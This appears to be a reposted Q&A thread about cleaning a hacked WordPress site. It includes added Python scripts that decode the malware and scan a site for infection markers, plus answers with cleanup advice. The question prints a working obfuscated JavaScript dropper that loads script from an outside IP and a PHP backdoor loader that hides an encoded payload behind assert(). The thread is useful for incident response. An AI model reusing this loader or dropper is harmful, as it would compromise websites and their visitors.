hacked - How to find the backdoor of the hack

admin2025-04-19  0

Today one of our clients' WordPress sites, which is hosted on Amazon AWS (Ubuntu), was hacked.

The issue is the one described at https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html

This JS code is injected into all JS files:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

and this is in index.php:

//###====###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKAypzRtCFOcp3AyqPtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cC3IloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cBvVvBjbxqKWfVQ0tVzu0qUN6Yl9vLKAbp2thpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEhLJ1yYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv4xqKAypzRhVvMcCGRznQ0vYz1xAFtvBQMxZGL3ZQH4LGyuLwN5LmWxAGMvZmL4MQZlMwOyZTHkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9QG05BEHAHIRyAEH9IIPjtAFx7VTA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9HFH1SG1IHYPN1XGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWTyvqvN9VTA1pzksMKuyLltxL2tcBlEcozMiVQ0tL3IloS9aMKEcozMiXPEwnPx7nJLtXPEcozMiJlWbqUEjK2AiMTHvKFR9ZwNjXKfxnJW2CFVvB30XL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvtuMJ1jqUxbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvZ2MvAQqvBTLmZmyvZmuzZ2VkLJR1BGEuMwD0AGN0ZTHvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));'); $strings($light);
//###====###

Steps I followed:

  1. I downloaded all the JS files locally (using the command zip -r js_files.zip wp-content -i '*.js'), replaced the malicious code using Sublime Text and uploaded them again.
  2. Deleted the malicious code from index.php.
  3. Blocked the IP address in .htaccess:

    Order Deny,Allow
    Deny from 134.249.116.78
    
  4. Changed the permissions on the folders and files (following http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/hosting-wordpress.html).

My question is:

After doing all this, the code is still being injected. How do I find the hacker's backdoor into the site? Please guide me.


Asked Feb 11, 2017 at 6:52 by Tamil Selvan C; edited Feb 11, 2017 at 12:54 by cjbj.
  • When the actual site once has been compromised the backdoor might as well be hiding inside the database or/and in some random location in the filesystem. I would suggest to make a clean wordpress install and also reinstall any third party plugins and themes. Of course you first need to backup your uploads folder and database. Then I would go through both the database and the current theme and look for any modifications. – Cyclonecode Commented Feb 11, 2017 at 12:31
  • Except that there might be compromised files even inside the uploads folder (I've seen them). And in the root. Or in any subdomains/add-on domains that are on the same host. You can do a clean WP install, but still have compromised files on your system. Only a full inspection of all files will ensure any malware is gone. And that includes hidden files (htaccess), ICO files that aren't really ICO files, and more. And, even in the database. – Rick Hellewell Commented Oct 16, 2019 at 1:40
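To see what the two injected snippets in the question actually do without executing them, here is an added Python analysis script; it is not part of the question or of any answer. It decodes the hex-escaped string table of the JS dropper and emulates its split/reverse/join step to recover the exact string handed to document.write, and it rebuilds the string the PHP loader passes to assert() the way PHP would, undoing the str_rot13 wrapper. The JS constant is the question's own sample with the array-index brackets restored; the PHP loader's payload is a constructed harmless placeholder, because in the real sample that payload is the backdoor body itself and is not reproduced here.

```python
import base64
import codecs
import json
import re

# Copy of the injected JS from the question (array index brackets restored);
# it is only parsed as text here, never executed.
INJECTED_JS = r'''var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))'''


def analyze_injected_js(js_source):
    """Decode the _0x... string table and emulate the single transform the dropper
    applies (literal.split(sep).reverse().join(sep)) to recover what document.write receives."""
    decl = re.search(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', js_source, re.S)
    if not decl:
        raise ValueError("no _0x... string table found")
    name, body = decl.group(1), decl.group(2)
    # Each table entry is a JS string literal made of \xNN escapes; decode them.
    strings = [bytes(s, "ascii").decode("unicode_escape")
               for s in re.findall(r'"((?:[^"\\]|\\.)*)"', body)]
    rest = js_source[decl.end():]
    n = re.escape(name)
    # Substituting the literals back makes the call readable without running it.
    readable = re.sub(n + r'\[(\d+)\]', lambda m: json.dumps(strings[int(m.group(1))]), rest)
    method = re.search(r'document\[' + n + r'\[(\d+)\]\]', rest)
    chain = re.search(
        n + r'\[(\d+)\]\[' + n + r'\[(\d+)\]\]\(' + n + r'\[(\d+)\]\)\['
        + n + r'\[(\d+)\]\]\(\)\[' + n + r'\[(\d+)\]\]\(' + n + r'\[(\d+)\]\)', rest)
    written = None
    if chain:
        lit, m1, sep, m2, m3, sep2 = (strings[int(g)] for g in chain.groups())
        if (m1, m2, m3) == ("split", "reverse", "join") and sep == sep2:
            parts = list(lit) if sep == "" else lit.split(sep)
            written = sep.join(reversed(parts))
    return {"strings": strings, "readable": readable,
            "method": strings[int(method.group(1))] if method else None,
            "written": written}


# Constructed stand-in for the loader's payload. In the real sample this is the
# backdoor body, base64-encoded and then rot13'd; here it is a harmless echo.
STAGE2 = 'echo "constructed placeholder body";'
PHP_LOADER = (
    '$strings = "as"; $strings .= "se";  $strings .= "rt"; '
    '$strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; '
    '$gbz = "riny(".$strings2("base64_decode");\n'
    '$light =  $strings2($gbz.\'("'
    + codecs.encode(base64.b64encode(STAGE2.encode()).decode(), "rot13")
    + '"));\'); $strings($light);'
)


def unwrap_php_loader(php_source):
    """Rebuild the string the loader hands to assert() the way PHP would.
    "as"."se"."rt" is assert, "st"."r_r"."ot13" is str_rot13, and
    str_rot13("riny(" . str_rot13("base64_decode") . '("<x>"));') evaluates to
    eval(base64_decode("<rot13(x)>")); so the real base64 never appears literally."""
    prefix = re.search(r'\$gbz\s*=\s*"([^"]*)"\.\$strings2\("([^"]*)"\)', php_source)
    payload = re.search(r"""\$strings2\(\$gbz\.'\("([^"]*)"\)\);'\)""", php_source)
    if not (prefix and payload):
        raise ValueError("loader shape not recognised")
    gbz = prefix.group(1) + codecs.encode(prefix.group(2), "rot13")
    executed = codecs.encode(gbz + '("' + payload.group(1) + '"));', "rot13")
    inner = re.fullmatch(r'eval\(base64_decode\("([^"]*)"\)\);', executed)
    stage2 = base64.b64decode(inner.group(1)).decode("utf-8", "replace") if inner else None
    return {"executed_by_assert": executed, "stage2_php": stage2}


if __name__ == "__main__":
    js = analyze_injected_js(INJECTED_JS)
    print("document." + js["method"] + "(...) receives:", js["written"])
    php = unwrap_php_loader(PHP_LOADER)
    print("assert() evaluates:", php["executed_by_assert"])
    print("stage 2 PHP:", php["stage2_php"])
```

The recovered "written" value is a script tag pointing at the same address the asker later blocked in .htaccess. That tag is emitted in each visitor's browser, so a server-side Deny rule, which only filters requests arriving at the server from that address, does not stop the injected page from loading it, and it does nothing about the PHP loader that keeps rewriting the files. With a real sample, the stage 2 PHP this returns is the code to read next: it is the part that tells you what the loader actually does on the host.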

3 Answers

With steps 1 and 2 you are only removing the symptoms of the infection, not the infection itself. Blocking access and changing permissions (steps 3 and 4) makes a difference for outside approaches to your system. But the infection is already inside your site. So, with these steps you do nothing to remove the infection.

The infection can be anywhere: in your theme, some plugin, hidden in the database, in WordPress core, you name it. The most foolproof way to approach this is to wipe the site entirely and install a backup. Else, you'll have to go through a lengthy process.

The backdoor is most likely located in the theme's functions.php file. Look through it and you will find the answer, I believe.

WordPress core is so rarely compromised. This must be caused by a malicious theme.

If you are looking for where the hack came from, you'll have to dig into your access logs. Not an easy thing.

I'd do the following basic steps:

  • backup everything to local computer
  • reinstall WP via the Dashboard/Update page
  • reload all themes (either manually, or by deleting the theme and reinstalling). A manual download-to-local-computer, then upload to theme folder (perhaps after deleting the files in the theme folder) might keep all settings
  • do the same for all plugins (manual or deactivate-delete-reinstall); again, the manual process might preserve plugin settings
  • check for any extra files in all folders (updated files will have the same timestamp, so look for files outside the reinstall date/time). Delete any 'extra' files.

There may be some damage in your database, so you could restore a backup copy of the database (you've made backups, right?).

Some hosts will restore a complete site backup; they might keep several recent backups. This will destroy any updated content/etc, so you may want to reinstall WP and themes and plugins anyway. Some hosts might have a backup copy of the database they could install.

Good luck.

Added: These are not all of the steps I use; my process is here: https://securitydawg.com/recovering-from-a-hacked-wordpress-site/ . Even core files can be compromised - I've seen it on one site I'm still working on (multiple add-on domains, some WP, some not, which makes it harder).
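As an added, self-contained Python example (not code from any of the answers or from the asker), the following script carries out the checks the answer above describes: it compares the live document root with a clean reference tree to list extra and modified files, flags files whose modification time differs from the reinstall time, and scans every file for the traits visible in the question's two samples (the _0x hex string table, the assert_options/ASSERT_QUIET_EVAL setup, the //###====### delimiter, function names glued together from short fragments, "base64_decode" passed as a string) plus PHP hiding behind a non-PHP extension, as the comments on the question warn about. Both trees, their contents and their timestamps are constructed in a temporary directory; the reinstall timestamp and the file names are assumptions, not values from the page.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Indicators distilled from the two samples in the question; everything else below is constructed.
INDICATORS = {
    "hex_string_array": re.compile(r"var\s+_0x[0-9a-fA-F]+\s*=\s*\[[^\]]*\\x[0-9a-fA-F]{2}"),
    "assert_quiet_eval": re.compile(r"assert_options\s*\(\s*ASSERT_QUIET_EVAL"),
    "loader_marker": re.compile(r"//###====###"),
    # function names assembled from tiny fragments ("as"."se"."rt") so that grep for the name fails
    "fragmented_name": re.compile(r'\$(\w+)\s*=\s*"\w{1,4}";\s*\$\1\s*\.=\s*"\w{1,4}";'),
    "base64_decode_as_string": re.compile(r'\(\s*"base64_decode"\s*\)'),
}
PHP_EXTENSIONS = {".php", ".phtml", ".inc"}
PHP_OPEN_TAG = re.compile(r"<\?(?:php|=)")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def list_files(root):
    """Map relative POSIX paths to Path objects for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}


def scan_file(path):
    """Return the indicator names that fire on one file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if Path(path).suffix.lower() not in PHP_EXTENSIONS and PHP_OPEN_TAG.search(text):
        hits.append("php_in_non_php_file")  # e.g. an .ico in uploads that is really PHP
    return hits


def audit(clean_root, live_root, reinstall_ts, tolerance=60):
    """Diff live against clean, then scan live for indicators and timestamp outliers."""
    clean, live = list_files(clean_root), list_files(live_root)
    report = {
        "extra": sorted(set(live) - set(clean)),
        "missing": sorted(set(clean) - set(live)),
        "modified": sorted(p for p in set(live) & set(clean)
                           if sha256_of(live[p]) != sha256_of(clean[p])),
        "indicators": {},
        "timestamp_outliers": [],
    }
    for rel, path in sorted(live.items()):
        hits = scan_file(path)
        if hits:
            report["indicators"][rel] = hits
        # Files written by the reinstall share its time; anything else deserves a look.
        if abs(path.stat().st_mtime - reinstall_ts) > tolerance:
            report["timestamp_outliers"].append(rel)
    return report


# ---- constructed demo data: a tiny "clean" tree and an infected "live" copy of it ----
REINSTALL_TS = 1486800000  # assumed: the moment the reinstall finished
CLEAN_FILES = {
    "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "wp-includes/js/jquery.js": "/*! constructed stand-in for jQuery */\n(function(){})();\n",
    "wp-content/themes/demo-theme/functions.php": "<?php\nadd_theme_support('title-tag');\n",
}
# Abbreviated constructed variant of the question's dropper: same shape, shortened table.
INJECTED_JS = r'''var _0xaae8=["","\x6A\x6F\x69\x6E","\x77\x72\x69\x74\x65"];document[_0xaae8[2]]("constructed");'''
LOADER = ('<?php\n//###====###\n@error_reporting(0);\n@assert_options(ASSERT_QUIET_EVAL, 1);\n'
          '$strings = "as"; $strings .= "se"; $strings .= "rt"; '
          '$strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; '
          '$gbz = "riny(".$strings2("base64_decode");\n//###====###\n')


def write_tree(root, files, mtime):
    for rel, content in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
        os.utime(p, (mtime, mtime))


def build_demo():
    """Construct a clean reference tree and an infected live tree in a temp dir."""
    base = Path(tempfile.mkdtemp(prefix="wp-audit-"))
    clean, live = base / "clean", base / "live"
    write_tree(clean, CLEAN_FILES, REINSTALL_TS)
    write_tree(live, CLEAN_FILES, REINSTALL_TS)  # untouched core and theme files
    write_tree(live, {
        "index.php": LOADER + CLEAN_FILES["index.php"].split("\n", 1)[1],
        "wp-includes/js/jquery.js": CLEAN_FILES["wp-includes/js/jquery.js"] + INJECTED_JS,
        "wp-content/uploads/2017/02/favicon.ico": "<?php /* constructed: PHP behind an image extension */ ?>",
    }, REINSTALL_TS + 3 * 86400)  # infected files were touched three days after the reinstall
    return clean, live, REINSTALL_TS


if __name__ == "__main__":
    import json
    clean_dir, live_dir, ts = build_demo()
    print(json.dumps(audit(clean_dir, live_dir, ts), indent=2))
```

For a real site, point audit() at a freshly downloaded copy of the same WordPress, theme and plugin versions as the reference and at the live document root, with the reinstall time taken from the last update. Every path listed under "extra" is a file the clean install never shipped, which is exactly the set the answer above tells you to delete; "modified" and "indicators" then narrow down which shipped files were tampered with, and a file that appears in none of the lists but still has an odd timestamp is worth opening by hand.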

Please credit the original source when reposting: http://conceptsofalgorithm.com/Algorithm/1745078001a283682.html
